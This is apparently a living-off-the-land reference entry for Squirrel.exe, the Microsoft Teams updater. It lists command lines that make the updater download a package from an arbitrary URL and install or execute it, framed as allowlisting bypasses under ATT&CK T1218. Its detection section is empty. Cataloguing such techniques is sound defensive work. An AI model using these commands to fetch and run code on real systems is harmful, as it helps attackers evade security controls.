.. /Squirrel.exe
Star

Download
AWL bypass
Execute

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.


Paths:

Resources:
Acknowledgements:

Detection:

Download

  1. The above binary will go to url and look for RELEASES file and download the nuget package.

    squirrel.exe --download [url to package]
    Use case
    Download binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218

AWL bypass

  1. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    squirrel.exe --update [url to package]
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218

  2. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    squirrel.exe --updateRoolback=[url to package]
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218

Execute

  1. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    squirrel.exe --update [url to package]
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218

  2. The above binary will go to url and look for RELEASES file, download and install the nuget package.

    squirrel.exe --updateRollback=[url to package]
    Use case
    Download and execute binary
    Privileges required
    User
    Operating systems
    Windows 7 and up with Microsoft Teams installed
    ATT&CK® technique
    T1218